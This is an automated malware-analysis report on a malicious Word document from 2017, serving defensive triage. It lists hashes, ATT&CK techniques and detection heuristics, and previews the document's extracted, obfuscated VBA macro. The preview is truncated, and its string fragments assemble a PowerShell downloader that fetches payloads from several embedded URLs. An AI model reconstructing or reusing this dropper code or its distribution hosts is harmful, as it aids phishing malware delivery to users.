Office (OLE) malware analysis — malicious · e4a291ac2231af05

MALICIOUS

Office (OLE)

184.0 KB Created: 2017-12-08 22:03:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 8f4e13261c02718ac3ba6e1f5c0d904f SHA-1: a6924ad3ec08f4b9ebd7a1653e78c729e159419b SHA-256: e4a291ac2231af05144d2b7183fe1a358a687570a1b986bccc3b287952dfe463

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, likely to download and run a second-stage payload from the reconstructed URL 'http://ecocleanlublin4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'. The presence of a password-protected archive lure heuristic suggests the document is designed to trick users into disabling security measures. The ClamAV detection 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4 In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71521 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	71521 bytes
SHA-256: `47ca75bd158a21dfb974fa9b917b0fdbcd8f14aa9d70883d49ec630ae15711b4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HiLwwbzDHw" Function knLzCYiMoocpuh() MAJnpp = UCase("plCSBtE" + "POXhSlH" + "dTzllGij" + "nkMBrfjMN" + "GPkjUvt") + UCase("JfuwTlvVVzAR" + "GVEOIsEXjoUF" + "ButncprZVATp" + "bGWJkMvRz" + "fRMCpJarZtijAc") PLqMbK = Mid("tmY3M8P4,15,25]-jOInWtpWtp) (((Wtp(4sWtp+WtpX4v2franc =4sX+Wtp+Wtp4sX new-4sX'+'+4sXobjec4sX+4sXt4sX+4sX Sy4sX+4Wtp+WtpsXstem.Net.W4sX+4sXebClio1Fi2", 8, 136) diXvhDj = UCase("CiurDoM" + "jsoIvwGKqwE" + "wpXKoWFjfE" + "nzJNDHGI" + "irhjpIX") + UCase("solIGjJNGjDjj" + "zchALllDDjp" + "qEHrUjw" + "qrSDhNAzw" + "CbRFsFzpwm") fTrswrkjnsa = UCase("WKaKlUlZrRzB" + "EIJSCANVQn" + "QuJuvir" + "ubNBVHO" + "usUlsHBnQj") + UCase("hzPNFXXuq" + "qdIZrHzq" + "oKnbScwC" + "ItViMRKG" + "OIdzNYNEPML") BAPEqf = UCase("JznpSMHKjOsm" + "BnaMavwJ" + "dVVjVQYwbIGcj" + "PwHnzPuPG" + "zzKPjphQXQUS") + UCase("jqrmknkffU" + "LQTIztwNOp" + "WFIPlaqEQuzc" + "wHcKcWATil" + "TWZQdSH") SsfzcBBjAzi = Mid("mNFjCBC0aBj5kEch00qerolWtp+Wtpimitm4sX+4sXarketi4sX+'+'4sXn'+'4sX+4sXg4sX+4sX.4'+'sX+4sXcomWt'+'p+Wtp/JKDw/,httpsWtp+Wtp4sWtp+WtpX+4sX://malea4sX+4sXdUiP1HsFijaHkM", 20, 131) vwfZUPn = UCase("ADzJvFt" + "wkJVOlzpMQ" + "PkcjhdqwPOONj" + "IIpYURMQjidzH" + "caXrwVvRXUPf") + UCase("IiJiWZi" + "dHRrziz" + "uFiVHUo" + "WPOvrkVJpMDma" + "GZddzTGAwqwQcO") PXwvl = UCase("izUldVB" + "paEiNnvL" + "QoksoQsTEvOAa" + "zmuwYbVzpaM" + "tZHqjbNY") + UCase("iWKqicSZ" + "nJOzGrTpWk" + "RzJjcXSMNP" + "nBOTQjHqzDZP" + "DwuTPXqFdCviM") sCXOhHBKIp = UCase("zAELbZEQcoKPZc" + "kuusjTztcEz" + "hmtYwIbVrdE" + "zUjojFshHnHD" + "icaCHbGivW") + UCase("iPOGzHkHpNv" + "nIJWMPWuf" + "ASfASjBwCCzCF" + "rljADANKjN" + "uzFtOZczsPvaz") ajqjDjQi = Mid("MqUjD0i9QbCDNHHoO2X+4sXsQU/bP6.SpWtp+WtpliWtp+Wtpt'+'(Wtp+WtpbP'+'64sX+4sX,bP6);4v2karapas4sX+4sX ='+' 4v2nsadasd.n4sX+4sX'+'ext(14sX+4sX, 343245);4v2huas =4sX+4sX 4sX+4mHWTZuGzDXawA1", 19, 151) SlzHa = UCase("NLKFMKAVNkm" + "jhfkSsjWcjc" + "zqYhJwToDFuipw" + "FnhjJjnnJ" + "skCvqBjiKH") + UCase("lTLORwXimA" + "TfiivzTSKDPHRO" + "tMDNwirrT" + "VUriPIWYzR" + "QHGjOszSWL") UTtBpfBfWQ = UCase("AFqKsRkCqfajV" + "ibqjSMXlwEodU" + "MEwLmLC" + "XzqvDsHZThDlUQ" + "MIkRPIlVPz") + UCase("pljPuJojEqtX" + "fiWlHZii" + "fjDBummldazVDV" + "EmuzkMhTkallm" + "OqPwtFz") ksDQY = UCase("LoqSiRmdGb" + "QiJmvSk" + "pzavVfHwmTI" + "bmzNQfhdrMzST" + "trHhZYzopWks") + UCase("nXTAJwmdii" + "WQlHndwIcjlPqF" + "jpnwdcXKuGYMpT" + "IPNLLJnsALXc" + "lBHcuPPwp") qqBIBOlz = Mid("jwEj16aEJ4tJent;44sX+4sXv2nsad4sX+4sXasd '+'4sX+4sX= new'+'-objecWtp+Wtpt rando4sX+4sXmTikz", 13, 75) MwuMjj = UCase("sOCzTNSZ" + "cIfjUflzjwQSb" + "BAkOkiWJ" + "rsufvntUA" + "mJcGTuLi") + UCase("JHitRGA" + "iwirRSsnoazqKq" + "QGozYtRUYEV" + "HJwcZup" + "WRUVrkSf") WOmuK = UCase("BUwFqAORIpvb" + "CfukvzmkFA" + "YtwwRaEj" + "hLqMDwrmu" + "nVKiFwAiT") + UCase("DwwTrjzCSAilLI" + "qoijwGzqqNlOO" + "zQvkkOkPXUWzo" + "tjBJBpPHSz" + "tEGGGGSjJS") SdfmzXsk = UCase("FFiQFfnDPKtukc" + "NncKZrwfl" + "ChHDiabdYFRKoc" + "BrHWrrN" + "ZJFCivHHZtSCzj") + UCase("kjSQMWADzzFXzq" + "uGomitZY" + "iQwrQWZIVsWmYa" + "ZYGGDYX" + "QQzMOKwF") JOpwd = Mid("jKOFlAzi6ovnIFV4t1h7R9.4sX'+'+4sXcom4sX+4sX/Bn83/,http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'+'sX+4sXr4s'+'X+4sXWtp+Wtp/,htt4sX+4sXp://m4sXWtp+Wtp+4sXath4sX+4'+'sXemagic.Wtp+WtpZY4XhDJ9T6w", 23, 171) iFBPD = UCase("mAbuEaRNKzRf" + "JLbNYdszzPrKiJ" + "NEPfBJtBi" + "lopEnUbY" + "wuiEKjam") + UCase("kkkaRAzFkmimP" + "sGnoCsKv" + "lUMWjAFwb" + "FQwWLWoFik" + "uWjklzXrXtipU") iTiwTcbaob = UCase("LVhvXJmc" + "zCHTWVfnNK" + "TVXLJhbRKLzXm" + "bDtGBPTd" + "bUzztdjbzoR") + UCase("pzVmphVSNziVH" + "RmhLuTprwqJkhn" + "kAjVTmGXULh" + "KPcqipzMutltzC" + "BfcFzhpdzvznIL") zPbFodMGooS = UCase("zjKVjmiqzjqfJ" + "jvUEUNCmwl" + "OppIzCDALfZk" + "rOzRaPYM" + "TRUdKBRqLmZoU") + UCase("tiBdnfzrJLIMFO" + "LhMUbWYnTsBj" + "TmKYXRFjYl" + "hp ... (truncated)

SHA-256: 47ca75bd158a21dfb974fa9b917b0fdbcd8f14aa9d70883d49ec630ae15711b4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HiLwwbzDHw"
Function knLzCYiMoocpuh()
MAJnpp = UCase("plCSBtE" + "POXhSlH" + "dTzllGij" + "nkMBrfjMN" + "GPkjUvt") + UCase("JfuwTlvVVzAR" + "GVEOIsEXjoUF" + "ButncprZVATp" + "bGWJkMvRz" + "fRMCpJarZtijAc")
PLqMbK = Mid("tmY3M8P4,15,25]-jOInWtpWtp) (((Wtp(4sWtp+WtpX4v2franc =4sX+Wtp+Wtp4sX new-4sX'+'+4sXobjec4sX+4sXt4sX+4sX Sy4sX+4Wtp+WtpsXstem.Net.W4sX+4sXebClio1Fi2", 8, 136)
diXvhDj = UCase("CiurDoM" + "jsoIvwGKqwE" + "wpXKoWFjfE" + "nzJNDHGI" + "irhjpIX") + UCase("solIGjJNGjDjj" + "zchALllDDjp" + "qEHrUjw" + "qrSDhNAzw" + "CbRFsFzpwm")
fTrswrkjnsa = UCase("WKaKlUlZrRzB" + "EIJSCANVQn" + "QuJuvir" + "ubNBVHO" + "usUlsHBnQj") + UCase("hzPNFXXuq" + "qdIZrHzq" + "oKnbScwC" + "ItViMRKG" + "OIdzNYNEPML")
BAPEqf = UCase("JznpSMHKjOsm" + "BnaMavwJ" + "dVVjVQYwbIGcj" + "PwHnzPuPG" + "zzKPjphQXQUS") + UCase("jqrmknkffU" + "LQTIztwNOp" + "WFIPlaqEQuzc" + "wHcKcWATil" + "TWZQdSH")
SsfzcBBjAzi = Mid("mNFjCBC0aBj5kEch00qerolWtp+Wtpimitm4sX+4sXarketi4sX+'+'4sXn'+'4sX+4sXg4sX+4sX.4'+'sX+4sXcomWt'+'p+Wtp/JKDw/,httpsWtp+Wtp4sWtp+WtpX+4sX://malea4sX+4sXdUiP1HsFijaHkM", 20, 131)
vwfZUPn = UCase("ADzJvFt" + "wkJVOlzpMQ" + "PkcjhdqwPOONj" + "IIpYURMQjidzH" + "caXrwVvRXUPf") + UCase("IiJiWZi" + "dHRrziz" + "uFiVHUo" + "WPOvrkVJpMDma" + "GZddzTGAwqwQcO")
PXwvl = UCase("izUldVB" + "paEiNnvL" + "QoksoQsTEvOAa" + "zmuwYbVzpaM" + "tZHqjbNY") + UCase("iWKqicSZ" + "nJOzGrTpWk" + "RzJjcXSMNP" + "nBOTQjHqzDZP" + "DwuTPXqFdCviM")
sCXOhHBKIp = UCase("zAELbZEQcoKPZc" + "kuusjTztcEz" + "hmtYwIbVrdE" + "zUjojFshHnHD" + "icaCHbGivW") + UCase("iPOGzHkHpNv" + "nIJWMPWuf" + "ASfASjBwCCzCF" + "rljADANKjN" + "uzFtOZczsPvaz")
ajqjDjQi = Mid("MqUjD0i9QbCDNHHoO2X+4sXsQU/bP6.SpWtp+WtpliWtp+Wtpt'+'(Wtp+WtpbP'+'64sX+4sX,bP6);4v2karapas4sX+4sX ='+' 4v2nsadasd.n4sX+4sX'+'ext(14sX+4sX, 343245);4v2huas =4sX+4sX 4sX+4mHWTZuGzDXawA1", 19, 151)
SlzHa = UCase("NLKFMKAVNkm" + "jhfkSsjWcjc" + "zqYhJwToDFuipw" + "FnhjJjnnJ" + "skCvqBjiKH") + UCase("lTLORwXimA" + "TfiivzTSKDPHRO" + "tMDNwirrT" + "VUriPIWYzR" + "QHGjOszSWL")
UTtBpfBfWQ = UCase("AFqKsRkCqfajV" + "ibqjSMXlwEodU" + "MEwLmLC" + "XzqvDsHZThDlUQ" + "MIkRPIlVPz") + UCase("pljPuJojEqtX" + "fiWlHZii" + "fjDBummldazVDV" + "EmuzkMhTkallm" + "OqPwtFz")
ksDQY = UCase("LoqSiRmdGb" + "QiJmvSk" + "pzavVfHwmTI" + "bmzNQfhdrMzST" + "trHhZYzopWks") + UCase("nXTAJwmdii" + "WQlHndwIcjlPqF" + "jpnwdcXKuGYMpT" + "IPNLLJnsALXc" + "lBHcuPPwp")
qqBIBOlz = Mid("jwEj16aEJ4tJent;44sX+4sXv2nsad4sX+4sXasd '+'4sX+4sX= new'+'-objecWtp+Wtpt rando4sX+4sXmTikz", 13, 75)
MwuMjj = UCase("sOCzTNSZ" + "cIfjUflzjwQSb" + "BAkOkiWJ" + "rsufvntUA" + "mJcGTuLi") + UCase("JHitRGA" + "iwirRSsnoazqKq" + "QGozYtRUYEV" + "HJwcZup" + "WRUVrkSf")
WOmuK = UCase("BUwFqAORIpvb" + "CfukvzmkFA" + "YtwwRaEj" + "hLqMDwrmu" + "nVKiFwAiT") + UCase("DwwTrjzCSAilLI" + "qoijwGzqqNlOO" + "zQvkkOkPXUWzo" + "tjBJBpPHSz" + "tEGGGGSjJS")
SdfmzXsk = UCase("FFiQFfnDPKtukc" + "NncKZrwfl" + "ChHDiabdYFRKoc" + "BrHWrrN" + "ZJFCivHHZtSCzj") + UCase("kjSQMWADzzFXzq" + "uGomitZY" + "iQwrQWZIVsWmYa" + "ZYGGDYX" + "QQzMOKwF")
JOpwd = Mid("jKOFlAzi6ovnIFV4t1h7R9.4sX'+'+4sXcom4sX+4sX/Bn83/,http://ecocleanlublin4sX+4sX.4sX+4sXpl/V4sX+4sXmJWtp+WtpT4'+'sX+4sXr4s'+'X+4sXWtp+Wtp/,htt4sX+4sXp://m4sXWtp+Wtp+4sXath4sX+4'+'sXemagic.Wtp+WtpZY4XhDJ9T6w", 23, 171)
iFBPD = UCase("mAbuEaRNKzRf" + "JLbNYdszzPrKiJ" + "NEPfBJtBi" + "lopEnUbY" + "wuiEKjam") + UCase("kkkaRAzFkmimP" + "sGnoCsKv" + "lUMWjAFwb" + "FQwWLWoFik" + "uWjklzXrXtipU")
iTiwTcbaob = UCase("LVhvXJmc" + "zCHTWVfnNK" + "TVXLJhbRKLzXm" + "bDtGBPTd" + "bUzztdjbzoR") + UCase("pzVmphVSNziVH" + "RmhLuTprwqJkhn" + "kAjVTmGXULh" + "KPcqipzMutltzC" + "BfcFzhpdzvznIL")
zPbFodMGooS = UCase("zjKVjmiqzjqfJ" + "jvUEUNCmwl" + "OppIzCDALfZk" + "rOzRaPYM" + "TRUdKBRqLmZoU") + UCase("tiBdnfzrJLIMFO" + "LhMUbWYnTsBj" + "TmKYXRFjYl" + "hp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.